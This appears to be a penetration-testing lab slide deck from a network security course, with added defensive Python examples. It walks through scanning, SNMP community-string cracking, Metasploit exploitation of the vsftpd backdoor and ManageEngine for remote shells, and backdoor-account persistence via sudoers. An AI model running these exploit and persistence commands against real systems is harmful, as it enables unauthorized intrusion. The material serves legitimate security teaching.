Network Security Training
Vulnerability Assessment and
Penetration Testing
Virtual Lab Environment
• Open academy.apnic.net
• Click on Virtual Labs, then make sure you’re logged in
• Find the Vulnerability Scanning and Penetration Testing Lab
• Click “Launch Lab”, it will take 1-2 min to load the new lab session
• Once started, you can resize the pop-up lab window as you see fit
• “Instructions” gives you instructions and links
• Click the green text to have it immediately typed into the active window
• “Resources” lets you access the Kali username/password
Virtual Lab Environment
• The lab environment is set for 3 hours of active time
• This can be extended when you see a pop-up in the bottom-right
corner
• After the timer expires, your lab will be saved in its last state
• You can re-open your lab to resume where you left off
• Saved labs will be kept for 7 days
Penetration Testing
• Vulnerability assessment
• A methodical review of all vulnerabilities within the scoped
system/network
• The goal is a prioritised list of vulnerabilities to guide the
administrators in their remediation efforts
• Usually performed when you know you have issues, as a way to
improve security
• Can be performed with credentials (host based) or non-credentialed
(network based)
• This can be seen as part of an audit
Penetration Testing
• Penetration test (aka pen test)
• Simulated attacks to compromise a system within the scoped
system/network
• The goal is to obtain access to what is considered the “crown jewels”
• In capture the flag (CTF) competitions, this is called the “flag”
• Used to test mature security defenses
• On its own, a penetration test does not look for all vulnerabilities, just
the ones needed to achieve the goal
• This is what they do in movies
Penetration Testing
• Defining the Scope
• It’s important to define the scope to cover the breadth and depth of the
assessment
• What systems and networks are allowed to be tested? (attack surface)
• How far can the testing go from non-intrusive scanning to active
exploitation (intrusive)
• What is the goal or objective of the testing team? What flag to capture?
• Black box test – testing without prior or inside knowledge, external team
• White box test – testing with knowledge of the environment, usually an
internal team
Penetration Testing
• Legal issues
• When performing the actions of an attacker it’s important to stay on the
right side of the law
• There are entire codes of ethics around professional pentesters and
pentest certifications
• Stay legal in your actions, and always have permission
• Contracts (pre-test) and reports (post-test) take up the majority of your time
• Black hats – no permission, illegal activity
• White hats – security professionals, operating legally and with permission
• Grey hats – sitting on the fence, performing both legal and illegal actions,
possibly reformed(?) black hats
Penetration Testing
• Post-Pentest Reports
• Shows dramatic proof of vulnerabilities and risks
• Document all actions taken in a reproducible form
• Detail the amount of effort required during the test, as an indication
of the level of protection employed on the systems
• Provide actionable intelligence to mitigate the vulnerabilities
exploited, and other issues discovered during the test
• A large collection of publicly available pentest reports
• github.com/juliocesarfort/public-pentesting-reports
Penetration Testing
• Regular security testing
• Vulnerability assessments and penetration tests are best performed
on a regular basis
• May be required for compliance, but remember most compliance is
just a minimum baseline
• Some vulnerability assessment tools can perform continuous
scanning to quickly detect changes to the environment
• New servers turned on, new applications installed, opening firewall policies
• Penetration tests are best repeated after remediation work has been
completed, as by their nature a single penetration test may not find all
vulnerabilities
Penetration Testing
• Attack Life Cycle
Security Tools and Measures
• Reiterating legal issues
• You only have permission to perform these hands-on exercises in
this specific Academy virtual lab network, 192.168.30.xxx
• Get permission before using any of these tools or techniques on
any other network, such as your work network or cloud providers
Security Tools and Measures
• VM information
• Kali Linux is our main attacking platform, use this by default
• Boot Kali and make sure you can log in with
Username: root
Password: toor
• Open a terminal window and run ifconfig
• You should have the address 192.168.30.101
• Also note the addresses for the Metasploitable 2 and 3
VMs as listed in the Instructions tab
Security Tools and Measures
• Nmap
• Network Mapper, for network discovery and auditing
• Combines port scanning, firewall detection/evasion, service version
detection, OS detection, and more
• Featured in The Matrix Reloaded, Die Hard 4, Girl With the Dragon
Tattoo, The Bourne Ultimatum, and many more
Screenshots at nmap.org/movies/
Security Tools and Measures
• Nmap
• nmap -sS <meta2_IP>
• Example: nmap -sS 192.168.30.102
• -sS uses a TCP SYN scan to find open ports, and doesn’t complete
the 3-way handshake. This is best used on its own to get fast
results and to be a little stealthy.
• Because we are not completing the 3 way handshake and not
connecting to the services fully, the nmap output will only show if
the port is open or closed.
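From the defender's side, the half-open behaviour described above is exactly what makes a SYN scan visible: one source sends SYNs to many ports on a host and never completes the handshake with an ACK. The following is an added example, not part of the APNIC deck, that runs that detection logic over a constructed sample of packet records (source, destination, destination port, TCP flags in tcpdump-style letters); the sensor format and the threshold of five half-open ports are assumptions for the example.

```python
from collections import defaultdict

# Constructed sample of TCP packets seen by a network sensor, as
# (src_ip, dst_ip, dst_port, tcp_flags). Flags: S = SYN, SA = SYN/ACK,
# A = ACK, R = RST, RA = RST/ACK. Addresses follow the lab's 192.168.30.x range.
PACKETS = [
    # Kali (.101) probing Meta2 (.102): SYN, SYN/ACK back, then RST, never an ACK
    ("192.168.30.101", "192.168.30.102", 21, "S"),
    ("192.168.30.102", "192.168.30.101", 21, "SA"),   # port 21 open
    ("192.168.30.101", "192.168.30.102", 21, "R"),    # scanner tears the half-open connection down
    ("192.168.30.101", "192.168.30.102", 22, "S"),
    ("192.168.30.102", "192.168.30.101", 22, "SA"),
    ("192.168.30.101", "192.168.30.102", 22, "R"),
    ("192.168.30.101", "192.168.30.102", 23, "S"),
    ("192.168.30.102", "192.168.30.101", 23, "SA"),
    ("192.168.30.101", "192.168.30.102", 23, "R"),
    ("192.168.30.101", "192.168.30.102", 25, "S"),
    ("192.168.30.102", "192.168.30.101", 25, "RA"),   # port 25 closed: RST/ACK
    ("192.168.30.101", "192.168.30.102", 80, "S"),
    ("192.168.30.102", "192.168.30.101", 80, "SA"),
    ("192.168.30.101", "192.168.30.102", 80, "R"),
    # A normal client (.50) completing the three-way handshake to SSH
    ("192.168.30.50", "192.168.30.102", 22, "S"),
    ("192.168.30.102", "192.168.30.50", 22, "SA"),
    ("192.168.30.50", "192.168.30.102", 22, "A"),
]


def detect_half_open_scans(packets, min_ports=5):
    """Return {(src, dst): [ports]} for sources that sent SYNs to at least
    min_ports distinct ports on a host without ever sending the final ACK."""
    syn_ports = defaultdict(set)    # (src, dst) -> ports that received a SYN
    completed = defaultdict(set)    # (src, dst) -> ports where src later sent an ACK
    for src, dst, dport, flags in packets:
        key = (src, dst)
        if flags == "S":
            syn_ports[key].add(dport)
        elif flags == "A" and dport in syn_ports.get(key, ()):
            completed[key].add(dport)   # handshake finished: a real connection, not a probe
    suspects = {}
    for key, ports in syn_ports.items():
        half_open = ports - completed.get(key, set())
        if len(half_open) >= min_ports:
            suspects[key] = sorted(half_open)
    return suspects


if __name__ == "__main__":
    for (src, dst), ports in detect_half_open_scans(PACKETS).items():
        print("possible SYN scan from %s against %s, half-open ports: %s" % (src, dst, ports))
```

Note that the closed port (25, answered with RST/ACK) still counts: the source sent a SYN and never completed a handshake there either, so a scan against mostly-closed ports is caught just as well as one against open ports.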
Security Tools and Measures
• Nmap
• nmap -sV -O <meta2_IP>
^^ this is a capital “oh”
• -sV tests the open ports to find service and version information, but
will have to make a full connection
• -O (capital ‘oh’) enables OS detection
• nmap -sU -p 50-170 <meta2_IP>
• -sU scans UDP ports 50-170 (scanning a large range is slow)
Security Tools and Measures
• You can also output nmap results to an XML file using
-oX filename
• Useful for automated tools to read and interpret the results
• nmap -sV -oX nmap1.xml <meta2_IP>
• less nmap1.xml
Security Tools and Measures
• Use ndiff to compare scans looking for differences
• Useful to compare scans over time to find unknown/unexpected
changes, and can be scripted to run at regular intervals
• Test before and after making security changes to see the impact
• cd nmap
• ls -al
• Try comparing nmap1 against nmap2, then nmap2 against nmap3
• ndiff nmap1.xml nmap2.xml
• Discuss: What are the differences between the 2 dated files?
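The two slides above (writing scans with -oX, then comparing them with ndiff) are the basis of the "continuous scanning" idea from the Regular security testing slide. As an added example that is not part of the deck or of the nmap project, here is a small Python script that reads two nmap XML files and reports new hosts, newly opened or closed ports, and service version changes. The two XML documents are constructed inline for the example (they follow the real nmap -oX element names, but are not the lab's nmap1.xml/nmap2.xml); in practice you would read the files written by -oX.

```python
import xml.etree.ElementTree as ET

# Constructed "before" scan: only Meta2 (192.168.30.102) with FTP and SSH open.
SCAN_BEFORE = """<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="192.168.30.102" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/></port>
    </ports>
  </host>
</nmaprun>"""

# Constructed "after" scan: FTP closed, SSH upgraded, a web server appeared,
# and a second host showed up with 445/tcp open.
SCAN_AFTER = """<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="192.168.30.102" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="closed"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="7.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.168.30.103" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>"""


def parse_open_ports(xml_text):
    """Return {ip: {(proto, port): 'name product version'}} for hosts that are up."""
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        open_ports = {}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            key = (port.get("protocol"), int(port.get("portid")))
            svc = port.find("service")
            parts = [svc.get(a) for a in ("name", "product", "version")] if svc is not None else []
            open_ports[key] = " ".join(p for p in parts if p)
        hosts[addr.get("addr")] = open_ports
    return hosts


def diff_scans(before_xml, after_xml):
    """Compare two scans; ports of a brand-new host are reported under 'opened' too."""
    before, after = parse_open_ports(before_xml), parse_open_ports(after_xml)
    changes = {"new_hosts": [], "gone_hosts": [], "opened": [], "closed": [], "service_changed": []}
    for ip in sorted(set(before) | set(after)):
        if ip not in before:
            changes["new_hosts"].append(ip)
        if ip not in after:
            changes["gone_hosts"].append(ip)
        b, a = before.get(ip, {}), after.get(ip, {})
        for key in sorted(set(b) | set(a)):
            if key not in b:
                changes["opened"].append((ip, *key))
            elif key not in a:
                changes["closed"].append((ip, *key))
            elif b[key] != a[key]:
                changes["service_changed"].append((ip, *key, b[key], a[key]))
    return changes


if __name__ == "__main__":
    # With real files: diff_scans(open("nmap1.xml").read(), open("nmap2.xml").read())
    for kind, items in diff_scans(SCAN_BEFORE, SCAN_AFTER).items():
        for item in items:
            print("%-16s %s" % (kind, item))
```

Run on a schedule and mailed to the administrators, the "opened" and "new_hosts" lists are the ones that most often reveal the unplanned changes the slide mentions (a server turned on, an application installed, a firewall policy opened).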
Security Tools and Measures
• SPARTA
• GUI on top of nmap
• Provides some other features like screenshotting, nikto web vulnerability
scanning, sql scanning, and staged nmap scans
• Run SPARTA: Applications > 02 - Vulnerability Analysis > sparta
• Click on the actual text “Click here to add host(s) to scope”
• Let’s scan your own Meta2 and Meta3 addresses, separated by a space
• When done, click on an IP address then click the tabs on the right
• Discuss: What interesting output do you see?
Security Tools and Measures
• NetBIOS and Nmap Scripts
• nmap supports a large variety of different scripts to perform tasks
beyond just port scanning
• This command uses all scripts whose names start with smb-enum*
• nmap --script=smb-enum* -p 445 <meta3_IP>
• Try running these tools against meta2 as well (Linux running smbd)
• nmap --script=smb-enum* -p 445 <meta2_IP>
• There’s also a group of default scripts that scan more than just
445/tcp
• nmap --script=default <meta3_IP>
Security Tools and Measures
• NetBIOS
• There are also wrapper scripts which combine several tools into one
• enum4linux <meta3_IP>
• Also try against meta2
• Discuss: What interesting output do you see?
What happens if you point it to your laptop?
Security Tools and Measures
• SNMP Community Strings
• In Kali, look at the snmp_short_pass.txt wordlist which some tools
can use to try brute force attacking the SNMP community string
• cd /usr/share/metasploit-framework/data/wordlists/
• ls -al
• less snmp_short_pass.txt
• Have a look at the snmp word list, these are common community strings
• (press q to exit from the less command)
• We deleted line 33 from the snmp_default_pass.txt file because it was
too long (a bug in the tool we use on the next slide)
Security Tools and Measures
• onesixtyone
• onesixtyone -c snmp_short_pass.txt 127.0.0.1
• Do you see where the default community string is displayed?
• ./change_snmpd.sh
• This changes the SNMP community string to something harder; then run
the onesixtyone command above again to crack the new
“password” (community string)
• If you run ./change_snmp.sh again, it will change it back to the easy one
Security Tools and Measures
• SNMP enumeration tools
• snmp-check -c pr1v4t3 127.0.0.1
• snmpwalk -c pr1v4t3 -v1 127.0.0.1
127.0.0.1 [pr1v4t3] Linux kali 4.12.0-kali2-amd64
• Whatever password you found using onesixtyone, use
that here to access the SNMP server. So if it was still
“public” then you would use “public” in snmp-check and
snmpwalk
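The three SNMP slides above show how quickly a community string taken from a wordlist such as snmp_short_pass.txt is found and then used with snmp-check and snmpwalk. The matching check on the administrator's side is to audit the SNMP daemon's own configuration before anyone else does. As an added example that is not part of the deck or of any of the tools named, the Python below reads a net-snmp style snmpd.conf and flags rocommunity/rwcommunity lines whose string appears in a weak-string list, is short, has no source restriction, or grants write access. The configuration text and the handful of wordlist entries are constructed for the example, and the 12-character minimum length is an assumed local policy, not a standard.

```python
import re

# Constructed: a few entries of the kind found in snmp_short_pass.txt.
# The real wordlist is longer; these common defaults are only an illustration.
WEAK_COMMUNITIES = {"public", "private", "manager", "admin", "cisco", "secret", "write", "read"}

# Assumed local policy for this example: community strings shorter than this are reported.
MIN_COMMUNITY_LEN = 12

# Constructed sample snmpd.conf (net-snmp syntax); not a file taken from the lab VM.
SAMPLE_SNMPD_CONF = """# constructed example snmpd.conf
rocommunity public default
rwcommunity private 192.168.30.0/24
rocommunity pr1v4t3 192.168.30.101
rouser monitor authpriv   # SNMPv3 user, not a community string: not checked here
"""

# rocommunity / rwcommunity (and their IPv6 variants): <directive> <community> [<source>] ...
COMMUNITY_RE = re.compile(r"^(r[ow]community6?)\s+(\S+)(?:\s+(\S+))?")


def audit_snmpd_conf(conf_text, weak_words=WEAK_COMMUNITIES, min_len=MIN_COMMUNITY_LEN):
    """Return a list of findings, one per community directive with at least one issue."""
    findings = []
    for lineno, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()          # drop comments
        m = COMMUNITY_RE.match(line)
        if not m:
            continue
        directive, community, source = m.groups()
        issues = []
        if community.lower() in weak_words:
            issues.append("community string is in the default/weak wordlist")
        if len(community) < min_len:
            issues.append("community string shorter than %d characters" % min_len)
        if source is None or source == "default":
            issues.append("no source restriction: any client that knows the string can query")
        if directive.startswith("rw"):
            issues.append("write access granted; restrict to read-only or move to SNMPv3")
        if issues:
            findings.append({"line": lineno, "directive": directive,
                             "community": community, "issues": issues})
    return findings


if __name__ == "__main__":
    # With a real file: audit_snmpd_conf(open("/etc/snmp/snmpd.conf").read())
    for f in audit_snmpd_conf(SAMPLE_SNMPD_CONF):
        print("line %d (%s %s):" % (f["line"], f["directive"], f["community"]))
        for issue in f["issues"]:
            print("    - " + issue)
```

In the lab, the "easy" string that onesixtyone finds immediately is the first case (a wordlist entry with no source restriction); the "harder" one set by change_snmpd.sh is still short enough to be found by a wordlist, which is why the audit reports length and SNMPv3 as well.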
Security Tools and Measures
• OpenVAS
• In the beginning (1998), there was Nessus, an open source security
and vulnerability scanner
• In 2005, Nessus 3 was changed to closed source and sold under
the new Tenable Network Security company
• Nessus 2 was still open source and was forked into OpenVAS,
Open Vulnerability Assessment System
• OpenVAS uses community created/maintained Network
Vulnerability Tests (NVTs)
Security Tools and Measures
• OpenVAS
• WebUI created by Greenbone
• Start the OpenVAS services: openvas-start
• Open Firefox browser and go to https://127.0.0.1:9392
• Username = admin
• Password = password
• Exercise: Schedule an immediate scan (and wait)
• Exercise: Review pre-made reports, and deltas/differences
Security Tools and Measures
• Nikto
• Nikto is a web server scanning tool to find server misconfigurations,
dangerous files, old server versions, and other vulnerabilities
• https://cirt.net/Nikto2
• Let’s do a benchmark scan against the default Apache install on Kali
nikto -host 127.0.0.1 -ask no -output ~/nikto.txt
• Discuss: What do you see in the output?
This is a tilde symbol ~
Security Tools and Measures
• Metasploit
• Penetration testing software
• Used to find, exploit, and validate vulnerabilities
• Metasploit Framework is an open source project
• Commercial versions are maintained and sold by Rapid7 and focus
on a web interface, automation, and streamlining common tasks
Security Tools and Measures
• Metasploit – Meta2 Linux exercise
• First, let’s use nmap to scan the Meta2 Linux VM
• nmap -sV <meta2_IP>
• Let’s look at the first one on the list, FTP server: vsftpd 2.3.4
• Run Metasploit
• Applications > 08 – Exploitation Tools > Metasploit
• Alternatively, you can just run msfconsole from a terminal window
• You should see a new terminal window with the prompt: msf >
• help
Security Tools and Measures
• This console uses tab completion to make typing easier
• search vsftpd
Matching Modules
================
   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution
• use exploit/unix/ftp/vsftpd_234_backdoor
• info
Security Tools and Measures
• show options
• set RHOST <meta2_IP>
• show payloads
• set PAYLOAD cmd/unix/interact
• run
• or you can type exploit if that makes you feel more like a hacker
• It won’t show a prompt, but try typing ifconfig and whoami and ls
Congrats, you just hacked a root shell on a remote server!
• More guides at
www.hackingtutorials.org/metasploit-tutorials/metasploit-commands/
Security Tools and Measures
• Now let’s make sure we can get back into this server later
• useradd -s /bin/bash notahacker
• passwd notahacker
• echo "notahacker ALL=(ALL) ALL" >> /etc/sudoers
• Open a new terminal on Kali, and SSH to Meta2 using notahacker
• ssh -l notahacker <meta2_IP>
• nmap <meta3_IP>
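The three commands on this slide (a new account with a shell, a password, and a sudoers entry) are the classic persistence footprint that a compromised host leaves behind, and they are exactly what a host-based check should catch. As an added example that is not part of the deck, the Python below compares a baseline snapshot of /etc/passwd and /etc/sudoers with a current one and reports new accounts, changed login shells, extra uid-0 accounts, and new sudoers rules. The snapshots are constructed inline (they are not the real files from the Metasploitable VM); the user name notahacker is taken from the slide.

```python
# Constructed baseline snapshots (before the exercise) and current snapshots
# (after it) of /etc/passwd and /etc/sudoers. Not the real files from the VM.
PASSWD_BASELINE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
"""
PASSWD_CURRENT = PASSWD_BASELINE + "notahacker:x:1001:1001::/home/notahacker:/bin/bash\n"

SUDOERS_BASELINE = """Defaults env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
"""
SUDOERS_CURRENT = SUDOERS_BASELINE + 'notahacker ALL=(ALL) ALL\n'


def parse_passwd(text):
    """Map user name -> {uid, shell} from /etc/passwd content (7 colon-separated fields)."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = fields
        users[name] = {"uid": int(uid), "shell": shell}
    return users


def parse_sudoers(text):
    """Set of whitespace-normalised sudoers rules; comments and Defaults lines are ignored."""
    rules = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        rules.add(" ".join(line.split()))
    return rules


def detect_persistence(passwd_base, passwd_now, sudo_base, sudo_now):
    """Return human-readable alerts for account and sudo changes since the baseline."""
    alerts = []
    before, now = parse_passwd(passwd_base), parse_passwd(passwd_now)
    for name, info in now.items():
        if name not in before:
            alerts.append("new account %s (uid %d, shell %s)" % (name, info["uid"], info["shell"]))
        elif info["shell"] != before[name]["shell"]:
            alerts.append("shell changed for %s: %s -> %s" % (name, before[name]["shell"], info["shell"]))
        if info["uid"] == 0 and name != "root":
            alerts.append("extra uid-0 account %s" % name)
    for rule in sorted(parse_sudoers(sudo_now) - parse_sudoers(sudo_base)):
        alerts.append("new sudoers rule: %s" % rule)
    return alerts


if __name__ == "__main__":
    # With real files: read /etc/passwd and /etc/sudoers and compare against stored copies
    for alert in detect_persistence(PASSWD_BASELINE, PASSWD_CURRENT, SUDOERS_BASELINE, SUDOERS_CURRENT):
        print("ALERT: " + alert)
```

A baseline-and-diff check like this is cheap to run from cron; tools such as OpenVAS credentialed scans or a file integrity monitor do the same comparison at larger scale.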
Security Tools and Measures
• Metasploit – Meta3 Windows exercise
• First, let’s use nmap to scan the Meta3 Windows VM
• nmap -sV <Meta3_IP>
• Connect to port 8383 in a browser: https://<Meta3_IP>:8383
• ManageEngine… didn’t it have really bad vulnerability a few years ago?
• Of course in the real world you wouldn’t know or remember this, but with web
search tools it’s not overly difficult to search for known vulnerabilities in
applications and specific versions.
• Run Metasploit
• If you still have Metasploit open from the previous exercise, just type back
• Otherwise: Applications > 08 – Exploitation Tools > Metasploit
Security Tools and Measures
• search manageengine
• Look for exploit/windows/http/manageengine_connectionid_write which has a
rank of “excellent”
• use exploit/windows/http/manageengine_connectionid_write
• info
• show options
• set RHOST <Meta3_IP>
• set RPORT 8383
• set SSL true
• run
• Now run Windows commands like ipconfig , pwd and dir
• Congrats, you just hacked a Windows remote shell that has
NT AUTHORITY\LOCAL SERVICE privileges
Security Tools and Measures
• Metasploit – SSH version detection
• This shows you the different features of Metasploit framework
• Run Metasploit
• Applications > 08 – Exploitation Tools > Metasploit
• search ssh_version
• use auxiliary/scanner/ssh/ssh_version
• info
• show options
• set RHOSTS <Meta2_IPs>
• set THREADS 100
• not necessary for this scan, but will help when scanning many hosts
• run